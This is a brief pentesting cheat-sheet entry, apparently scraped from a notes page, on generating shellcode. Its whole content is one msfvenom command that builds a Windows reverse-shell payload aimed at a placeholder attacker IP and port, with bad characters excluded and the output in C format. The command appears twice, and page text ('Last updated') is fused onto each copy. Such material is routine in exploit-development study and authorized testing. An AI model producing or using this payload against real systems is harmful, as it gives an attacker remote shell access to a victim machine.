Generating shellcode
Generate reverse shell payload with msfvenom
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker ip> LPORT=<attacker port> EXITFUNC=thread -b "\x00\x08\x2c\xad" -f cLast updated
Generate reverse shell payload with msfvenom
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker ip> LPORT=<attacker port> EXITFUNC=thread -b "\x00\x08\x2c\xad" -f cLast updated